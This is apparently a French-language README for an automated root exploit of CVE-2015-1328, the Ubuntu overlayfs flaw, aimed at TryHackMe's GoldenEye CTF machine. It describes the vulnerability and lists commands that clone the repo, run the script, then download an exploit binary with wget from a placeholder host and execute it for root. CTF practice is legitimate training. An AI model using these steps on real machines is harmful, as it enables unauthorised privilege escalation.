
Exploit automatisé d'escalade de privilèges locaux pour CVE-2015-1328 ciblant Ubuntu overlayfs, conçu pour les environnements CTF avec un simple script de déploiement bash.
L'implémentation d'overlayfs dans le package linux (aka noyau Linux) avant 3.19.0-21.21 dans Ubuntu jusqu'à 15.04 ne vérifie pas correctement les permissions pour la création de fichiers dans le répertoire du système de fichiers supérieur, ce qui permet aux utilisateurs locaux d'obtenir un accès root en exploitant une configuration dans laquelle overlayfs est autorisé dans un espace de noms de montage arbitraire.
Merci à rebel
Ceci est un exploit automatisé pour CVE-2015-1328 pour le CTF GoldenEye de TryHackMe. Par défaut, gcc n'est pas disponible sur cette machine, j'ai donc configuré gcc en cc et exécuté l'exploit en conséquence pour obtenir les privilèges root.
Installation
Clonez simplement ce dépôt -
$ git clone https://github.com/elit3pwner/CVE-2015-1328-GoldenEye.git
$ cd CVE-2015-1328-GoldenEye
$ chmod +x exploit.sh
$ bash exploit.sh
$ wget http://<target ip>:6969/exploit
$ chmod +x exploit
$ ./exploit